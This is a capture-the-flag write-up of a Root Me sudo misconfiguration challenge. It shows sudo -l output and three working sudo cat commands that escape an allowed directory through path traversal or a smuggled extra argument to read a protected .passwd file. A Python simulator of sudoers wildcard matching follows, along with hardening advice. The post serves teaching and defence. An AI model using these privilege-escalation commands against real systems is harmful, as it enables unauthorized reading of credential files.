Saturday, 6 October 2018

RootMe - CTF App Security - Sudo - Weak Configuration

Let's come back to the second challenge of


Root Me lets us practise on a large set of challenges, grouped into categories: App - Script, App - System, Cracking, Cryptanalysis, Forensic, Network, Programming, Realist, Steganography, Web - Client, Web - Server.

Let's start with the first category: App - Script.

The second challenge that we face is: Sudo - Weak Configuration:

Vulnerability type:
  • Privilege Escalation by Sudo weak configuration

##################################################

In this challenge, the working directory contains two directories, ch1 and ch1cracked, and one readme.md file.
The readme.md says that the .passwd file is located in /challenge/app-script/ch1/ch1cracked/.
Trying cd ch1cracked fails with a permission error, so we cannot enter it directly. ls -la shows that only the app-script-ch1-cracked user can access that folder.

We need to check with sudo which commands, and on which paths, our user (app-script-ch1) may run as the app-script-ch1-cracked user.

To do this, we type:
  • sudo -l
and we get:
Matching Defaults entries for app-script-ch1 on challenge02:
    env_reset,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    !mail_always, !mail_badpass, !mail_no_host, !mail_no_perms,
    !mail_no_user
User app-script-ch1 may run the following commands on challenge02:
    (app-script-ch1-cracked) /bin/cat /challenge/app-script/ch1/ch1/*
Focus on the last two rows: our user may run the cat command, as app-script-ch1-cracked, on anything under the /challenge/app-script/ch1/ch1/ folder. The trailing * is the weakness. sudo matches the command-line arguments against the sudoers rule with fnmatch-style globbing, and when matching arguments the * also matches '/' and spaces, so anything we append after the allowed prefix is accepted: a ../ path component that walks out of the directory, or a second, completely different absolute path.

To access to the ch1cracked folder and to the .passwd file, type:
  • cd ch1
  • sudo -u app-script-ch1-cracked cat /challenge/app-script/ch1/ch1/../ch1cracked/.passwd
or
  • cd ch1
  • sudo -u app-script-ch1-cracked cat /challenge/app-script/ch1/ch1/ ../ch1cracked/.passwd
or
  • cd ch1
  • sudo -u app-script-ch1-cracked cat /challenge/app-script/ch1/ch1/shared_notes /challenge/app-script/ch1/ch1cracked/.passwd
In each of these variants the cat command runs as the app-script-ch1-cracked user, which is allowed to read ch1cracked/.passwd.
IMPORTANT: the first argument MUST be an absolute path that starts with the literal prefix /challenge/app-script/ch1/ch1/, because that is the text that precedes the * in the sudoers rule. A relative path such as ../ch1cracked/.passwd on its own does not match the rule and sudo refuses to run the command. In the second and third variants the extra arguments are only there to be swallowed by the *; in the second one ../ch1cracked/.passwd is resolved relative to the current directory, which is why we cd ch1 first.
In the second variant the allowed directory must end with '/': with /challenge/app-script/ch1/ch1 followed by a space, the argument string no longer matches /challenge/app-script/ch1/ch1/*. cat reports that the first argument is a directory and then reads the second one.
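The matching logic above is easy to reason about wrongly, so here is a small simulator, added to this write-up and not part of the Root Me challenge or of sudo itself. It reproduces the documented sudoers rules for command arguments (a rule with no arguments allows any arguments, a rule with "" allows none, otherwise the arguments joined by single spaces are globbed against the rule's argument pattern, where * also matches '/' and spaces), runs the three working invocations from this post plus two that sudo rejects against the weak rule and against a hardened rule with no wildcard, and flags every argument that resolves outside the directory the operator meant to expose. The paths and the file name shared_notes are those shown on this page; the name HARDENED_RULE and the helper functions are my own.

```python
import fnmatch
import os

# Constructed: argument part of the rule printed by `sudo -l` on the challenge box.
WEAK_RULE = "/bin/cat /challenge/app-script/ch1/ch1/*"
# Constructed: what the operator most likely meant, with the wildcard dropped.
HARDENED_RULE = "/bin/cat /challenge/app-script/ch1/ch1/shared_notes"

INTENDED_DIR = "/challenge/app-script/ch1/ch1"
CWD = INTENDED_DIR  # the post does `cd ch1` before running sudo


def rule_matches(rule, argv):
    """Approximate sudoers matching of one Cmnd against a user's argv.

    argv[0] must equal the rule's command path. The remaining arguments are
    joined with single spaces and globbed as one string against the rule's
    argument pattern. sudo does this without FNM_PATHNAME, so '*' matches
    '/' and ' ' too, which is exactly why a trailing '*' is dangerous.
    """
    rule_cmd, _, rule_args = rule.partition(" ")
    if argv[0] != rule_cmd:
        return False
    joined = " ".join(argv[1:])
    if rule_args == "":        # no arguments listed: any arguments allowed
        return True
    if rule_args == '""':      # explicit "": command must be run bare
        return joined == ""
    return fnmatch.fnmatchcase(joined, rule_args)


def resolved_targets(argv, cwd):
    """Paths cat would actually open, resolved from cwd with normpath only
    (no filesystem access, so symlinks are not followed)."""
    return [os.path.normpath(os.path.join(cwd, a)) for a in argv[1:]]


def escapes_intended_dir(argv, cwd=CWD):
    """True if any argument lands outside INTENDED_DIR."""
    base = INTENDED_DIR.rstrip("/") + "/"
    return any(not (t + "/").startswith(base) for t in resolved_targets(argv, cwd))


# Constructed invocations: the three from this post, two that sudo rejects,
# and the one legitimate use of the rule.
INVOCATIONS = {
    "traversal": ["/bin/cat", "/challenge/app-script/ch1/ch1/../ch1cracked/.passwd"],
    "two_args": ["/bin/cat", "/challenge/app-script/ch1/ch1/", "../ch1cracked/.passwd"],
    "smuggled": ["/bin/cat", "/challenge/app-script/ch1/ch1/shared_notes",
                 "/challenge/app-script/ch1/ch1cracked/.passwd"],
    "relative": ["/bin/cat", "../ch1cracked/.passwd"],                          # rejected
    "no_slash": ["/bin/cat", "/challenge/app-script/ch1/ch1", "../ch1cracked/.passwd"],  # rejected
    "legit": ["/bin/cat", "/challenge/app-script/ch1/ch1/shared_notes"],
}


def audit(rule, cwd=CWD):
    """Map each invocation name to (allowed by the rule, escapes the directory).
    A (True, True) entry is a rule that grants more than it was meant to."""
    return {name: (rule_matches(rule, argv), escapes_intended_dir(argv, cwd))
            for name, argv in INVOCATIONS.items()}


if __name__ == "__main__":
    for label, rule in (("weak", WEAK_RULE), ("hardened", HARDENED_RULE)):
        print(f"== {label}: {rule}")
        for name, (allowed, escapes) in audit(rule).items():
            print(f"  {name:10} allowed={allowed!s:5} escapes_dir={escapes}")
```

Against the weak rule, traversal, two_args and smuggled are all allowed and all escape the directory; relative and no_slash are refused by sudo for the reasons given above; only legit is both allowed and contained. Against the hardened rule only legit matches. The lesson for anyone writing sudoers: a wildcard after a directory prefix cannot stop ../ or a second argument, so either name the files explicitly or grant a wrapper script that validates its own argument.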

When we run the command, sudo prompts for app-script-ch1's password, so we enter app-script-ch1 (the same password used to log in over SSH at the start of the challenge).

We will get the solution.

